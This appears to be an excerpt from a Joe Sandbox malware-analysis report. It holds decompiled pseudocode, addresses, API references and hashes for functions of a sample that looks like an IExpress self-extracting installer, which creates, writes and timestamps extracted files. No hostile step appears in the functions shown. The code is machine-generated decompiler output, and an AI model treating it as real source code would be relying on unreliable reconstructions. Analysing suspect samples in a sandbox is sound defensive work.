                                                                                                                                                                                                        							_t71 =  &(_t71[1]);
                                                                                                                                                                                                        							__eflags = _t39;
                                                                                                                                                                                                        						} while (_t39 != 0);
                                                                                                                                                                                                        						_t69 = _t71 - _t73;
                                                                                                                                                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							L3:
                                                                                                                                                                                                        							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0x1f91e4;
                                                                                                                                                                                                        						_t30 = E001F4702( &_v268, 0x1f91e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t41 = E001F476D( &_v268, __eflags);
                                                                                                                                                                                                        						__eflags = _t41;
                                                                                                                                                                                                        						if(_t41 == 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0x180);
                                                                                                                                                                                                        						_t30 = E001F4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                        						_t75 = _t30;
                                                                                                                                                                                                        						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                        						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E001F47E0( &_v268);
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0x1f93f4 =  *0x1f93f4 + 1;
                                                                                                                                                                                                        						_t33 = _t75;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t44 = _t36 - 1;
                                                                                                                                                                                                        					__eflags = _t44;
                                                                                                                                                                                                        					if(_t44 == 0) {
                                                                                                                                                                                                        						_t54 = 0x1f91e4;
                                                                                                                                                                                                        						_t63 = 0x1f91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t45 =  *_t63;
                                                                                                                                                                                                        							_t63 =  &(_t63[1]);
                                                                                                                                                                                                        							__eflags = _t45;
                                                                                                                                                                                                        						} while (_t45 != 0);
                                                                                                                                                                                                        						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t64 = _t63 - 0x1f91e5;
                                                                                                                                                                                                        						__eflags = _t64;
                                                                                                                                                                                                        						_t69 =  &(_t74[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t46 =  *_t74;
                                                                                                                                                                                                        							_t74 =  &(_t74[1]);
                                                                                                                                                                                                        							__eflags = _t46;
                                                                                                                                                                                                        						} while (_t46 != 0);
                                                                                                                                                                                                        						_t73 = _t74 - _t69;
                                                                                                                                                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0x1f91e4;
                                                                                                                                                                                                        						_t30 = E001F4702( &_v268, 0x1f91e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                        						_t30 = E001F4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E001F4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                        						__eflags = _t50;
                                                                                                                                                                                                        						if(_t50 != 0) {
                                                                                                                                                                                                        							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                        							__eflags = _t51;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t51 = 0x80;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t33 = 1;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t30 = _t44 - 1;
                                                                                                                                                                                                        					__eflags = _t30;
                                                                                                                                                                                                        					if(_t30 == 0) {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a4 == 3) {
                                                                                                                                                                                                        					_t30 = E001F4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L3;
                                                                                                                                                                                                        			}































                                                                                                                                                                                                        0x001f4cd0
                                                                                                                                                                                                        0x001f4cdb
                                                                                                                                                                                                        0x001f4ce0
                                                                                                                                                                                                        0x001f4ce2
                                                                                                                                                                                                        0x001f4cee
                                                                                                                                                                                                        0x001f4cf2
                                                                                                                                                                                                        0x001f4d0e
                                                                                                                                                                                                        0x001f4d0e
                                                                                                                                                                                                        0x001f4d11
                                                                                                                                                                                                        0x001f4e83
                                                                                                                                                                                                        0x001f4e88
                                                                                                                                                                                                        0x001f4e98
                                                                                                                                                                                                        0x001f4e98
                                                                                                                                                                                                        0x001f4d17
                                                                                                                                                                                                        0x001f4d17
                                                                                                                                                                                                        0x001f4d1a
                                                                                                                                                                                                        0x001f4d2f
                                                                                                                                                                                                        0x001f4d2f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4d2f
                                                                                                                                                                                                        0x001f4d1c
                                                                                                                                                                                                        0x001f4d1c
                                                                                                                                                                                                        0x001f4d1f
                                                                                                                                                                                                        0x001f4dcb
                                                                                                                                                                                                        0x001f4dd0
                                                                                                                                                                                                        0x001f4dd2
                                                                                                                                                                                                        0x001f4ddd
                                                                                                                                                                                                        0x001f4ddd
                                                                                                                                                                                                        0x001f4de3
                                                                                                                                                                                                        0x001f4de8
                                                                                                                                                                                                        0x001f4ded
                                                                                                                                                                                                        0x001f4ded
                                                                                                                                                                                                        0x001f4def
                                                                                                                                                                                                        0x001f4df0
                                                                                                                                                                                                        0x001f4df0
                                                                                                                                                                                                        0x001f4df4
                                                                                                                                                                                                        0x001f4df4
                                                                                                                                                                                                        0x001f4df6
                                                                                                                                                                                                        0x001f4df9
                                                                                                                                                                                                        0x001f4dfc
                                                                                                                                                                                                        0x001f4dfc
                                                                                                                                                                                                        0x001f4dfe
                                                                                                                                                                                                        0x001f4dff
                                                                                                                                                                                                        0x001f4dff
                                                                                                                                                                                                        0x001f4e03
                                                                                                                                                                                                        0x001f4e08
                                                                                                                                                                                                        0x001f4e0a
                                                                                                                                                                                                        0x001f4e0f
                                                                                                                                                                                                        0x001f4d03
                                                                                                                                                                                                        0x001f4d03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4d03
                                                                                                                                                                                                        0x001f4e18
                                                                                                                                                                                                        0x001f4e20
                                                                                                                                                                                                        0x001f4e25
                                                                                                                                                                                                        0x001f4e27
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4e33
                                                                                                                                                                                                        0x001f4e38
                                                                                                                                                                                                        0x001f4e3a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4e40
                                                                                                                                                                                                        0x001f4e51
                                                                                                                                                                                                        0x001f4e56
                                                                                                                                                                                                        0x001f4e5b
                                                                                                                                                                                                        0x001f4e5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4e6a
                                                                                                                                                                                                        0x001f4e6f
                                                                                                                                                                                                        0x001f4e71
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4e77
                                                                                                                                                                                                        0x001f4e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4e7d
                                                                                                                                                                                                        0x001f4d25
                                                                                                                                                                                                        0x001f4d25
                                                                                                                                                                                                        0x001f4d28
                                                                                                                                                                                                        0x001f4d36
                                                                                                                                                                                                        0x001f4d3b
                                                                                                                                                                                                        0x001f4d40
                                                                                                                                                                                                        0x001f4d40
                                                                                                                                                                                                        0x001f4d42
                                                                                                                                                                                                        0x001f4d43
                                                                                                                                                                                                        0x001f4d43
                                                                                                                                                                                                        0x001f4d47
                                                                                                                                                                                                        0x001f4d4a
                                                                                                                                                                                                        0x001f4d4a
                                                                                                                                                                                                        0x001f4d4c
                                                                                                                                                                                                        0x001f4d4f
                                                                                                                                                                                                        0x001f4d4f
                                                                                                                                                                                                        0x001f4d51
                                                                                                                                                                                                        0x001f4d52
                                                                                                                                                                                                        0x001f4d52
                                                                                                                                                                                                        0x001f4d56
                                                                                                                                                                                                        0x001f4d5b
                                                                                                                                                                                                        0x001f4d5d
                                                                                                                                                                                                        0x001f4d62
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4d67
                                                                                                                                                                                                        0x001f4d6f
                                                                                                                                                                                                        0x001f4d74
                                                                                                                                                                                                        0x001f4d76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4d7c
                                                                                                                                                                                                        0x001f4d84
                                                                                                                                                                                                        0x001f4d89
                                                                                                                                                                                                        0x001f4d8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4d94
                                                                                                                                                                                                        0x001f4d99
                                                                                                                                                                                                        0x001f4d9e
                                                                                                                                                                                                        0x001f4da1
                                                                                                                                                                                                        0x001f4daa
                                                                                                                                                                                                        0x001f4daa
                                                                                                                                                                                                        0x001f4da3
                                                                                                                                                                                                        0x001f4da3
                                                                                                                                                                                                        0x001f4da3
                                                                                                                                                                                                        0x001f4db5
                                                                                                                                                                                                        0x001f4dbb
                                                                                                                                                                                                        0x001f4dbd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4dc3
                                                                                                                                                                                                        0x001f4dc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4dc5
                                                                                                                                                                                                        0x001f4dbd
                                                                                                                                                                                                        0x001f4d2a
                                                                                                                                                                                                        0x001f4d2a
                                                                                                                                                                                                        0x001f4d2d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4d2d
                                                                                                                                                                                                        0x001f4cf8
                                                                                                                                                                                                        0x001f4cfd
                                                                                                                                                                                                        0x001f4d02
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 001F4DB5
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 001F4DDD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFileItemText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                        • API String ID: 3625706803-1610346413
                                                                                                                                                                                                        • Opcode ID: 2d62b9d16fd03785bd1d9dccc433a379221dc640380029b1070ddde49c4a7be2
                                                                                                                                                                                                        • Instruction ID: 5dc0f55afec41585ee42d6b022bbc38c90a40320c1e6cc3efa04d331103e313e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d62b9d16fd03785bd1d9dccc433a379221dc640380029b1070ddde49c4a7be2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D41773620410D8BCB25AFB8DD446F773A5FF65340F044668EA8A97686DF31EE8AC750
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                        				struct _FILETIME _v12;
                                                                                                                                                                                                        				struct _FILETIME _v20;
                                                                                                                                                                                                        				FILETIME* _t14;
                                                                                                                                                                                                        				int _t15;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t21 = __ecx * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t21 + 0x1f8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t14 =  &_v12;
                                                                                                                                                                                                        					_t15 = SetFileTime( *(_t21 + 0x1f8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        0x001f4c40
                                                                                                                                                                                                        0x001f4c4a
                                                                                                                                                                                                        0x001f4c8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4c70
                                                                                                                                                                                                        0x001f4c70
                                                                                                                                                                                                        0x001f4c7e
                                                                                                                                                                                                        0x001f4c86
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4c8a

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • DosDateTimeToFileTime.KERNEL32 ref: 001F4C54
                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001F4C66
                                                                                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 001F4C7E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Time$File$DateLocal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2071732420-0
                                                                                                                                                                                                        • Opcode ID: 3dca0326b4d6ab6da497b97f7b6b43cf4f50ab0448de2f1a2692188127066302
                                                                                                                                                                                                        • Instruction ID: a9560a72b6a8a87a707858438866b0352f90081d5f74d621fda06e0f762e1512
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3dca0326b4d6ab6da497b97f7b6b43cf4f50ab0448de2f1a2692188127066302
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96F0B4B260120CAFAB24DFB4CC48DBB77ACEF04350B44452BBA19C1050EB34E958C7A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E001F487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				CHAR* _t11;
                                                                                                                                                                                                        				long _t18;
                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t11 = __ecx;
                                                                                                                                                                                                        				asm("sbb edi, edi");
                                                                                                                                                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                        				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                        					asm("sbb esi, esi");
                                                                                                                                                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                        						asm("sbb esi, esi");
                                                                                                                                                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t23 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                        					return _t7;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E001F490C(_t11);
                                                                                                                                                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        0x001f4880
                                                                                                                                                                                                        0x001f488c
                                                                                                                                                                                                        0x001f4894
                                                                                                                                                                                                        0x001f48a0
                                                                                                                                                                                                        0x001f48c9
                                                                                                                                                                                                        0x001f48ce
                                                                                                                                                                                                        0x001f48a2
                                                                                                                                                                                                        0x001f48a8
                                                                                                                                                                                                        0x001f48b7
                                                                                                                                                                                                        0x001f48bc
                                                                                                                                                                                                        0x001f48aa
                                                                                                                                                                                                        0x001f48ac
                                                                                                                                                                                                        0x001f48ac
                                                                                                                                                                                                        0x001f48a8
                                                                                                                                                                                                        0x001f48de
                                                                                                                                                                                                        0x001f48e7
                                                                                                                                                                                                        0x001f490b
                                                                                                                                                                                                        0x001f48ee
                                                                                                                                                                                                        0x001f48f0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4902

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,001F4A23,?,001F4F67,*MEMCAB,00008000,00000180), ref: 001F48DE
                                                                                                                                                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,001F4F67,*MEMCAB,00008000,00000180), ref: 001F4902
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: cfda0653601998b4ab77a079b179b9a3ec3b1142da5c9806e652ca3194a8e442
                                                                                                                                                                                                        • Instruction ID: fddf93a6ca8a602fe57c5a46a7e7aa1c81a20ab4fb1da80c8ac2fb11e0d5483c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfda0653601998b4ab77a079b179b9a3ec3b1142da5c9806e652ca3194a8e442
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 520128A3E1557826F22440694C88BB7551C9B9A674F1B0234BEEAA61D1D6645C0481E0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E001F4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				int _t12;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				struct HWND__* _t21;
                                                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 =  *0x1f858c; // 0x268
                                                                                                                                                                                                        				_t9 = E001F3680(_t20);
                                                                                                                                                                                                        				if( *0x1f91d8 == 0) {
                                                                                                                                                                                                        					_push(_t24);
                                                                                                                                                                                                        					_t12 = WriteFile( *(0x1f8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t25 = _a12;
                                                                                                                                                                                                        						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        							_t14 =  *0x1f9400; // 0xa3800
                                                                                                                                                                                                        							_t15 = _t14 + _t25;
                                                                                                                                                                                                        							 *0x1f9400 = _t15;
                                                                                                                                                                                                        							if( *0x1f8184 != 0) {
                                                                                                                                                                                                        								_t21 =  *0x1f8584; // 0x0
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x1f93f8, 0);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return _t9 | 0xffffffff;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x001f4ad5
                                                                                                                                                                                                        0x001f4adb
                                                                                                                                                                                                        0x001f4ae7
                                                                                                                                                                                                        0x001f4aee
                                                                                                                                                                                                        0x001f4b05
                                                                                                                                                                                                        0x001f4b0d
                                                                                                                                                                                                        0x001f4b14
                                                                                                                                                                                                        0x001f4b1a
                                                                                                                                                                                                        0x001f4b1c
                                                                                                                                                                                                        0x001f4b21
                                                                                                                                                                                                        0x001f4b2a
                                                                                                                                                                                                        0x001f4b2f
                                                                                                                                                                                                        0x001f4b31
                                                                                                                                                                                                        0x001f4b39
                                                                                                                                                                                                        0x001f4b54
                                                                                                                                                                                                        0x001f4b54
                                                                                                                                                                                                        0x001f4b39
                                                                                                                                                                                                        0x001f4b2f
                                                                                                                                                                                                        0x001f4b0f
                                                                                                                                                                                                        0x001f4b0f
                                                                                                                                                                                                        0x001f4b0f
                                                                                                                                                                                                        0x001f4b5e
                                                                                                                                                                                                        0x001f4ae9
                                                                                                                                                                                                        0x001f4aed
                                                                                                                                                                                                        0x001f4aed

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 001F369F
                                                                                                                                                                                                          • Part of subcall function 001F3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001F36B2
                                                                                                                                                                                                          • Part of subcall function 001F3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001F36DA
                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 001F4B05
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1084409-0
                                                                                                                                                                                                        • Opcode ID: df752bb6f930c4725e292c380ca321fc149079ea4d9a2bfc43cb81995cd010ba
                                                                                                                                                                                                        • Instruction ID: a3cf50ef06bde09e54d596e3fead39a36cb20d38290920e9e7ba211be9100817
                                                                                                                                                                                                        • Opcode Fuzzy Hash: df752bb6f930c4725e292c380ca321fc149079ea4d9a2bfc43cb81995cd010ba
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD01BC71200209ABDB189F68EC05BB77769FF84725F148225FA399B5F1CB70D892CB80
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				intOrPtr _t4;
                                                                                                                                                                                                        				char* _t6;
                                                                                                                                                                                                        				char* _t8;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				char* _t16;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				char* _t19;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = __ecx;
                                                                                                                                                                                                        				_t10 = __edx;
                                                                                                                                                                                                        				_t17 = __ecx;
                                                                                                                                                                                                        				_t1 = _t17 + 1; // 0x1f8b3f
                                                                                                                                                                                                        				_t12 = _t1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t4 =  *_t17;
                                                                                                                                                                                                        					_t17 = _t17 + 1;
                                                                                                                                                                                                        				} while (_t4 != 0);
                                                                                                                                                                                                        				_t18 = _t17 - _t12;
                                                                                                                                                                                                        				_t2 = _t18 + 1; // 0x1f8b40
                                                                                                                                                                                                        				if(_t2 < __edx) {
                                                                                                                                                                                                        					_t19 = _t18 + __ecx;
                                                                                                                                                                                                        					if(_t19 > __ecx) {
                                                                                                                                                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                        						if( *_t8 != 0x5c) {
                                                                                                                                                                                                        							 *_t19 = 0x5c;
                                                                                                                                                                                                        							_t19 =  &(_t19[1]);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t6 = _a4;
                                                                                                                                                                                                        					 *_t19 = 0;
                                                                                                                                                                                                        					while( *_t6 == 0x20) {
                                                                                                                                                                                                        						_t6 = _t6 + 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return E001F16B3(_t16, _t10, _t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0x8007007a;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        0x001f6592
                                                                                                                                                                                                        0x001f6594
                                                                                                                                                                                                        0x001f6596
                                                                                                                                                                                                        0x001f6598
                                                                                                                                                                                                        0x001f6598
                                                                                                                                                                                                        0x001f659b
                                                                                                                                                                                                        0x001f659b
                                                                                                                                                                                                        0x001f659d
                                                                                                                                                                                                        0x001f659e
                                                                                                                                                                                                        0x001f65a2
                                                                                                                                                                                                        0x001f65a4
                                                                                                                                                                                                        0x001f65a9
                                                                                                                                                                                                        0x001f65b2
                                                                                                                                                                                                        0x001f65b6
                                                                                                                                                                                                        0x001f65ba
